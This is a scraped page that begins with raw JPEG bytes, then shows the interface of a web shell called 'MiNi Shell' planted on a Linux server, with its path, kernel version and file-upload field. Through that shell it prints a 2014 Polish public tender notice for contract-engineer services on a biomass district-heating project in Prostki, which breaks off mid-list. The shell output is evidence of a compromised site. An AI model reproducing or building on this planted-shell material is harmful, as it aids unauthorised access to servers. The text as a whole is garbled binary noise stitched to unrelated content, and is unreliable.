JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140117/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140117/20768-N-2014.html

<p class="kh_header"><b>Prostki: Inżynier Kontraktu dla projektu 
Przebudowa i rozbudowa systemu zaopatrzenia w ciepło wraz z sieciami cieplnymi 
i węzłami z zastosowaniem odnawialnych źródeł energii w miejscowości Prostki</b><br>
<b>Numer ogłoszenia: 20768 - 2014; data zamieszczenia: 17.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Usług Komunalnych Sp. z o.o. , ul. Kolejowa 26, 19-335 Prostki, woj. warmińsko-mazurskie, tel. 87 611 20 78, faks 87 611 20 78.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pukprostki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z ograniczoną odpowiedzialnością.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Inżynier Kontraktu dla projektu 
Przebudowa i rozbudowa systemu zaopatrzenia w ciepło wraz z sieciami cieplnymi 
i węzłami z zastosowaniem odnawialnych źródeł energii w miejscowości Prostki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Tytuł i zakres zamówienia:

Inżynier Kontraktu dla projektu 
Przebudowa i rozbudowa systemu zaopatrzenia w ciepło wraz z sieciami cieplnymi 
i węzłami z zastosowaniem odnawialnych źródeł energii w miejscowości Prostki

Kody CPV: 
71.52.00.00-9 Usługi nadzoru budowlanego 
76.60.00.00-9 Usługi nadzoru nad rurociągami 

Zamówienie jest realizowane w ramach projektu WND-RPWM.06.02.01-28-041-13 pn. 

Przebudowa i rozbudowa systemu zaopatrzenia w ciepło wraz z sieciami cieplnymi i 

węzłami z zastosowaniem odnawialnych źródeł energii w miejscowości Prostki 

współfinansowanego z Unii Europejskiej ze środków Europejskiego Funduszu Rozwoju 

Regionalnego na podstawie umowy o dofinansowanie nr UDA-RPWM.06.02.01-28-041-13-00, w 

ramach działania 6.2: Ochrona środowiska przed zanieczyszczeniami i zniszczeniami. 

Wartość projektu brutto wynosi 8.722.914,00 zł w tym dofinansowanie w wysokości 

3.425.802,24 zł 

1.Przedmiotem niniejszego zamówienia są usługi Inżyniera Kontraktu związane z: 

administrowaniem kontraktem - zarządzaniem przedsięwzięciem, nadzorem technicznym i 

prawnym nad budową, kontrolą i weryfikacją  dokumentów wystawianych przez Wykonawców, 

rozliczaniem finansowym, rozliczaniem finansowym dofinansowania ze środków EFRR, 

monitorowaniem, raportowaniem, sprawozdawczością - projektu Przebudowa i rozbudowa 

systemu zaopatrzenia w ciepło wraz z sieciami cieplnymi i węzłami z zastosowaniem 

odnawialnych źródeł energii w miejscowości Prostki
2.W/w projekt obejmuje realizację w roku 2014-2015 następujących zadań inwestycyjnych: 
1)wykonanie Projektu Technicznego kotłowni oraz sieci cieplnej wraz z uzyskaniem 

niezbędnych uzgodnień i zezwoleń wynikających z przepisów Prawa budowlanego.
W etapie realizacyjnym należy zamontować:
2)dwa kotły na biomasę o mocy 2 MW każdy z multicyklonami, wentylatorami podmuchowymi 
i wyciągowymi, podajnikami paliwa przy kotłach,
3)zamontować układ rozdrabniania i podawania słomy: szarpacz 3-bebnowy ze stołem 

podawczym, przenośniki taśmowe - 2szt,
4)zamontować układ podawania zrębek drewna: wygarniacz hydrauliczny z silosu 2 

żerdziowy, przenośniki łańcuchowe - 2szt,
5)zamontować układ odpopielania: przenośnik zgrzebłowy popiołu, przenośnik taśmowy,
6)zamontować układ automatyki i zasilania urządzeń kotłów: rozdzielnice zasilająco 

sterownicze, czujniki, sondy
7)wykonać instalacje odprowadzania spalin (2 kominy i czopuchy - dwuścienne z blachy 

kwasoodpornej),
8)wykonać nową instalacje hydrauliczno-technologiczna i wyposażyć ja w pompy obiegowe 

c.o., c.w.u., cyrkulacyjne, sprzęgło hydrauliczne, zawory mieszające trójdrogowe, 

stacje uzdatniania wody, aparaturę kontrolno-pomiarowa i urządzenia zabezpieczające.,
9)zamontować izolacje termiczne na przewodach,
10)wykonać niezbędne roboty demontażowo-budowlane dotyczące pomieszczenia ciepłowni 
i magazynu na paliwo,
11)istniejący kocioł o mocy 500 kW połączyć w układzie kaskadowym z dwoma nowymi 

kotłami o mocy 2 MW każdy.
12)wykonać nowa siec preizolowaną do rozprowadzenia ciepła na cele grzewcze i cele 

c.w.u.(około 4 451,50 m) wraz z nowymi przyłączami c.o. w technologii rur 

preizolowanych do budynków,
13)montaż węzłów i przyłączy  ok. 106 obiektów: budynki wielorodzinne, jednorodzinne 

oraz obiekty publiczne w celu zasilania w c.o. i c.w.u..

Program Funkcjonalno-Użytkowy dla projektu Przebudowa i rozbudowa systemu zaopatrzenia 

w ciepło wraz z sieciami cieplnymi i węzłami z zastosowaniem odnawialnych źródeł 

energii w miejscowości Prostki stanowi Załącznik nr 8 do SIWZ 

UWAGA: 
Założenia i zakres prac opisanych w Programie Funkcjonalno-Użytkowym mogą ulec zmianie 

na etapie opracowania i uzgadniania dokumentacji technicznej, włącznie ze zmianą 

lokalizacji kotłowni oraz zmianą średnic i długości rurociągów sieci preizolowanej. W 

związku z tym całkowity koszt Projektu może ulec zmianie.  
  
3.Szczegółowy opis przedmiotu zamówienia:
Obowiązki Inżyniera Kontraktu (zwanego w dalszej części SIWZ Wykonawcą).
W imieniu i na rzecz Zamawiającego Inżynier Kontraktu przejmuje obowiązki:
-przygotowania, 
-zorganizowania,
-koordynowania,
-kontrolowania procesu inwestycyjnego - wykonywanie obowiązków Inżynierów nadzoru 

inwestorskiego zgodnie z Ustawą z dnia 7 lipca 1994 roku prawo budowlane (Dz.U. z 2013 

poz. 1409) oraz innymi obowiązującymi w tym zakresie aktami prawnymi poprzez 

reprezentowanie Zamawiającego na budowie przez sprawowanie kontroli zgodności 

wykonywanych robót z projektem i pozwoleniem na budowę, przepisami i obowiązującymi 

Polskimi Normami oraz zasadami wiedzy technicznej,
-rozliczenia finansowego projektu z uwzględnieniem kwalifikowalności kosztów zgodnie 
z wymaganiami dla projektów współfinansowanych z EFRR w ramach RPO WiM,
-monitorowania, raportowania i sprawozdawczości w zakresie rzeczowo - finansowym,
-obsługi okresu gwarancyjnego.

Inżynier Kontraktu (Wykonawca) w ramach swoich obowiązków przy realizacji projektu 

zobowiązany jest do:
3.1.Bezwzględnego przestrzegania warunków umowy o dofinansowanie projektu oraz 

wnikających z niej terminów i obowiązków.
3.2.Przeprowadzenia analizy dokumentacji technicznej projektu:
a.opracowanie wariantowych rozwiązań funkcjonalno-użytkowych Projektu mających na celu 

wypracowanie optymalnej lokalizacji kotłowni oraz przebiegu sieci ciepłowniczych 

generujących obniżenie całkowitych kosztów realizacji Projektu  
b.sprawdzenie, zgodnie z warunkami Rozporządzenia Ministra Infrastruktury z dnia 2 

września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, 

specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu 

funkcjonalno-użytkowego (Dz.U. 2013 poz. 1129) dokumentacji budowlanej dostarczonej 

przez Zamawiającego,
c.sprawdzenie zgodności dokumentacji projektowej ze specyfikacjami technicznymi 

wykonania 
i odbioru robót oraz przedmiarami i kosztorysami inwestorskimi,
d.przygotowanie ewentualnych wniosków do projektanta w celu naniesienia uwag w 

dokumentacji projektowej.
3.3.Przygotowanie procedury przetargowej w celu wyłonienia Wykonawcy zadań 

wymienionych w ust. 2 pkt 1)-13):
a.przygotowanie i uzgodnienie z Zamawiającym wszystkich dokumentów niezbędnych do 

przeprowadzenia postępowania o udzielenie zamówienia publicznego na realizację 

inwestycji w trybie przetargu nieograniczonego, w szczególności opisanie przedmiotu 

zamówienia na wykonie inwestycji w trybie Zaprojektuj i wybuduj zgodnie z przepisami 

ustawy - Prawo zamówień publicznych na podstawie otrzymanej dokumentacji 
b.pomoc w trakcie procesu przetargowego na roboty budowlane  - odpowiedzi na pytania 

Wykonawców,
c.uczestnictwo w roli eksperta w procesie oceny ofert na roboty budowlane,
d.przygotowanie umów z Wykonawcami robót budowlanych.
3.4.Współpraca z Wykonawcą robót budowlanych:
a.dostarczenie Wykonawcy robót budowlanych aktualnego Programu Funkcjonalno-Użytkowego 

oraz założeń i wytycznych uzgodnionych z Zamawiającym, niezbędnych do wykonania 

dokumentacji projektowej  i uzyskania decyzji pozwolenia na budowę,
b.przekazywanie terenu budowy Wykonawcom robót, w imieniu Zamawiającego i przy jego 

udziale, 
c.powiadamianie organu nadzoru budowlanego o terminie rozpoczęcia robót, 
z załączeniem oświadczeń kierownika budowy i Inżynierów nadzoru, potwierdzającym 

przyjęcie obowiązków na budowie,
d.przekazywanie Wykonawcom dzienników budowy, kontrolowanie prawidłowości prowadzenia 

dziennika budowy i dokonywanie w nim wpisów stwierdzających wszystkie okoliczności 

mające znaczenie dla właściwego procesu budowlanego oraz wyceny robót,
e.ustalenie metod składania i wzorów wszystkich wymaganych raportów, raportów 

inspekcyjnych, protokółów odbiorów częściowych i końcowego oraz innych dokumentów 

obowiązujących w ramach realizacji projektu,
f.ustalanie harmonogramu realizacji prac budowlano-montażowych,
g.organizowanie narad koordynacyjnych zgodnie z ustalonym harmonogramem.

3.5.Sprawowanie nadzoru inwestorskiego nad realizacją inwestycji zgodnie z prawem 

budowlanym oraz obowiązującymi przepisami w branżach:
-instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, 

gazowych, wodociągowych i kanalizacyjnych; 
-instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i 

elektroenergetycznych;
-budowlano - konstrukcyjnej,
-drogowej,
oraz koordynacji robót poszczególnych branż:
a)kontrola posiadanych kwalifikacji oraz uprawnień do prowadzenia prac budowlanych 

osób odpowiedzialnych za ich prowadzenie, świadectw i certyfikatów urządzeń i  

materiałów, które będą wymagane kontraktem  oraz ważności ubezpieczeń  osób 

zatrudnionych oraz używanego sprzętu,
b)wizytowanie budowy stosownie do postępu prac (min.1 raz na tydzień), sprawdzanie 

obmiarów, nadzorowanie i odbiór robót,
c)kontrolowanie dokumentów jakości, aprobat, deklaracji zgodności, atestów, itp., w 

celu nie dopuszczenia do budowy materiałów wadliwych lub niedopuszczonych do 

stosowania w Polsce,
d)sprawdzania zgodności dostaw urządzeń z zawartymi umowami na roboty budowlane 
i sprawdzanie kompletności wymaganych atestów, aprobat i gwarancji na ww. dostarczone 

urządzenia,
e)sporządzania wszystkich dokumentów niezbędnych do prowadzenia nadzoru nad robotami 

budowlanymi i montażowymi, objętych przedmiotem kontraktu, 
f)sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających,
g)uczestnictwo w odbiorach częściowych i końcowym jak również przygotowywanie  i 

udział w odbiorach gotowych obiektów i konstrukcji,
h)wydawanie zgody na wykonanie robót dodatkowych, zamiennych po uprzednim uzgodnieniu  

z Zamawiającym,
i)nadzorowanie przeprowadzanych prób, badań, testów i rozruchów instalacji i urządzeń 

oraz sprawdzanie instrukcji obsługi (gdzie jest to konieczne) opracowanej przez 

wykonawcę robót w celu przekazania inwestycji Zamawiającemu,
j)przyjmowanie od wykonawców robót wszelkich dokumentów wymaganych w terminie odbioru 

(atesty, aprobaty techniczne, protokoły badań, protokoły pomiarów, gwarancje, DTR i 

instrukcje obsługi zainstalowanych urządzeń i systemów, geodezyjne inwentaryzacje 

powykonawcze obiektów, itp),                  
k)przygotowanie dokumentów do wniosku w celu uzyskania pozwoleń na użytkowanie.

3.6.Rozliczenia finansowe:
a.prowadzenie rozliczeń finansowych zgodnie z odpowiednimi Wytycznymi Ministra Rozwoju 

Regionalnego dla Regionalnego Programu Operacyjnego Warmia i Mazury na lata 2007 - 

2013, a także obowiązującymi przepisami prawa polskiego, 
b.weryfikacja kosztów realizacji robót budowlanych objętych kontraktami zgodnie z 

wnioskiem o dofinansowanie projektu, wytycznymi w sprawie kwalifikowalności wydatków, 

zgodnie 
z warunkami umowy o dofinansowanie projektu,
c.przygotowanie wszystkich dokumentów niezbędnych do realizacji projektu, w tym 

wniosków o płatność w generatorze wniosków, płatność zaliczkową, sprawozdań rzeczowych 
i finansowych,  dokumentacji niezbędnej do rozliczenia projektu, aktualizacja wniosku 
o dotację i harmonogramów budowy w generatorze wniosków,
d.przestrzeganie wytycznych i wymagań oraz opracowywanie wszelkich dokumentów 
i rozliczeń z dofinansowania (w tym sporządzanie odpowiednich okresowych i 

ostatecznych sprawozdań wraz ze wszystkimi niezbędnymi załącznikami), 
e.całkowite końcowe rozliczenie rzeczowe i finansowe projektu zgodnie z umową 
o dofinansowaniu i ustalonymi zasadami rozliczania inwestycji,
f.przygotowanie dokumentów niezbędnych do audytu (jeżeli będzie przeprowadzany).

3.7.Współpraca z Zamawiającym:
a.składanie Zamawiającemu raportów na temat postępu robót budowlanych objętych 

przedmiotem kontraktu, umożliwiających wczesną analizę ewentualnych zagrożeń oraz 

przedkładanie zaleceń i propozycji rozwiązań w tym zakresie w formie sprawozdań 

miesięcznych i kwartalnych do oceny Zamawiającego,  
b.bieżące informowanie Zamawiającego o obowiązujących uregulowaniach prawnych, w tym 
o ewentualnej zmianie wytycznych w zakresie warunków i zasad realizacji kontraktu, 

będącego przedmiotem dofinansowania w ramach Regionalnego Programu Operacyjnego Warmia 

i Mazury na lata 2007 - 2013,
c.współpraca z Zamawiającym w zakresie  wszystkich niezbędnych, żądanych dokumentów, 

raportów, dotyczących rozliczeń, zgodnie z procedurami rozliczeniowymi RPO WiM,
d.stałe konsultowanie i fachowe doradztwo na rzecz Zamawiającego,
e.współpraca przy promocji projektu,
f.zestawienie dla Zamawiającego danych nowopowstałych środków trwałych.

3.8.Obsługa okresu gwarancyjnego:
a.w ramach umowy Inżyniera Kontraktu bez dodatkowego wynagrodzenia Wykonawca zapewni 

obsługę w okresie gwarancji liczonej od odbioru końcowego poszczególnych robót 

budowlanych,
b.uczestnictwo w przeglądach gwarancyjnych po upływie każdego roku od odbioru obiektu, 
c.uczestnictwo Inżynierów nadzoru odpowiednich branż, w terminie określonym przez 

Zamawiającego w rozpatrzeniu zgłoszonych przez Użytkownika i Zamawiającego usterek 
i wad w okresie gwarancji, 
d.wyegzekwowanie od wykonawcy robót budowlanych usunięcia stwierdzonych wad i usterek 

w okresie gwarancji.

3.9.Kierowanie i koordynowanie realizacji projektu: 
a.systematyczny monitoring postępu w realizacji projektu zgodnie z dokumentacją 

techniczną, dokumentami przetargowymi na roboty budowlane oraz zatwierdzonymi 

harmonogramami,
b.zapewnienie terminowego i prawidłowego zakończenia robót zgodnie z harmonogramami 

określonymi w stosownych dokumentacjach technicznych,
c.rozwiązywanie problemów i sporów powstałych w trakcie realizacji robót,
d.przygotowanie dokumentacji do rozstrzygnięcia ewentualnych sporów w trybie sądowym,
e.stałe uczestniczenie w naradach technicznych, problemowych i innych organizowanych 

przez wszystkie strony procesu inwestycyjnego 
f.podejmowanie czynności mających na celu ochronę interesów Zamawiającego,
g.pełnienie funkcji koordynacyjnych na budowie.

3.10.Inżynier Kontraktu w ramach umówionej ceny ryczałtowej, wykona także wszystkie 

inne obowiązki, czynności i zadania, które będą konieczne do prawidłowej realizacji 

umowy na roboty oraz zabezpieczenia interesów Zamawiającego
3.11.Inżynier Kontraktu dokona wizji lokalnej terenu budowy, a także zapozna się z 

dokumentacją techniczną i projektową, pozwoleniami, decyzjami, umowami, wytycznymi 

itp. oraz wszelkimi dodatkowymi informacjami, które jego zdaniem mogą być konieczne do 

przygotowania oferty oraz zawarcia umowy i wykonania zamówienia. Koszty wizji lokalnej 

terenu budowy ponosi Wykonawca (Inżynier Kontraktu)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9, 76.60.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 19.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunków udziału w postępowaniu zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w złożonych dokumentach i oświadczeniach wymaganych SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonanie (w przypadku świadczeń okresowych lub ciągłych również wykonywanych) w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie przynajmniej jedną usługę polegająca na sprawowaniu nadzoru inwestorskiego lub funkcji inwestora zastępczego lub Inżyniera Kontraktu nad budową, rozbudową lub modernizacją inwestycji o wartości brutto nie mniejszej niż 5.000.000,00 zł w branżach łącznie: instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych. Instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych. Budowlano- konstrukcyjnej. Drogowej. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu zgodnie z formułą spełnia-nie spełnia na podstawie informacji zawartych w złożonych dokumentach i oświadczeniach wymaganych SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunków udziału w postępowaniu zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w złożonych dokumentach i oświadczeniach wymaganych SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują co najmniej jedną osobą w każdej z poniższych specjalności, który będzie uczestniczyć w wykonywaniu zamówieniu: a)posiadającym uprawnienia budowlane do wykonywania samodzielnych funkcji w budownictwie w specjalności konstrukcyjno-budowlanej bez ograniczeń (lub odpowiadających im ważnych uprawnień budowlanych, które zostały wydane na podstawie wcześniej obowiązujących przepisów) z co najmniej 5 letnim doświadczeniem w zakresie nadzorowania (kierowania) robotami budowlanymi w zakresie posiadanych uprawnień (liczone od dnia uzyskania uprawnień). b)posiadającym uprawnienia budowlane do wykonywania samodzielnych funkcji w budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń (lub odpowiadających im ważnych uprawnień budowlanych, które zostały wydane na podstawie wcześniej obowiązujących przepisów) z co najmniej 5 letnim doświadczeniem w zakresie nadzorowania (kierowania) robotami budowlanymi w zakresie posiadanych uprawnień (liczone od dnia uzyskania uprawnień). c)posiadającym uprawnienia budowlane do samodzielnego nadzorowania (kierowania) robotami budowlanymi bez ograniczeń w specjalności drogowej (lub odpowiadających im ważnych uprawnień budowlanych, które zostały wydane na podstawie wcześniej obowiązujących przepisów) z co najmniej 5 letnim doświadczeniem w nadzorowaniu (kierowaniu)robotami budowlanymi w zakresie posiadanych uprawnień (liczone od dnia uzyskania uprawnień). d)posiadającym uprawnienia budowlane do wykonywania samodzielnych funkcji w budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń(lub odpowiadających im ważnych uprawnień budowlanych, które zostały wydane na podstawie wcześniej obowiązujących przepisów)  z co najmniej 5 letnim doświadczeniem w zakresie w zakresie posiadanych uprawnień (liczone od dnia uzyskania uprawnień).
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w złożonych dokumentach i oświadczeniach wymaganych SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca powinien być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 2.000.000,00 zł ( słownie: dwa miliony złotych ). 
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w złożonych dokumentach i oświadczeniach wymaganych SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
